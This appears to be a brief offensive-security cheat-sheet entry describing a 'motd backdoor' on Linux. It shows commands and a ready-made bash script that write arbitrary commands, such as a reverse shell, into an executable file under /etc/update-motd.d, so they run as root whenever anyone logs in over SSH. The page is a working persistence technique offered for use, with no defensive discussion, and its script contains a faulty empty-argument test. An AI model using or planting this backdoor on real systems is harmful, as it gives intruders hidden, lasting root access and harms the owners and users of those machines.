motd Backdoor
motd (message of he day) is printed every time we login via SSH service.
we can contaminate the motd file with a reverse shell or a local shell command
printf "#!/bin/bash\n$1" | sudo tee /etc/update-motd.d/na
sudo chmod +x /etc/update-motd.d/na
sudo /etc/init.d/ssh startnow we can SSH into the machine and get a root shell.
script:
#!/bin/bash
if [ $1 -z ]
then
echo "$0 <shell commands or binary file path>"
exit 1
fi
printf "#!/bin/bash\n$1" | sudo tee /etc/update-motd.d/na
sudo chmod +x /etc/update-motd.d/na
sudo /etc/init.d/ssh start
echo "[+] Now try to ssh..."Last updated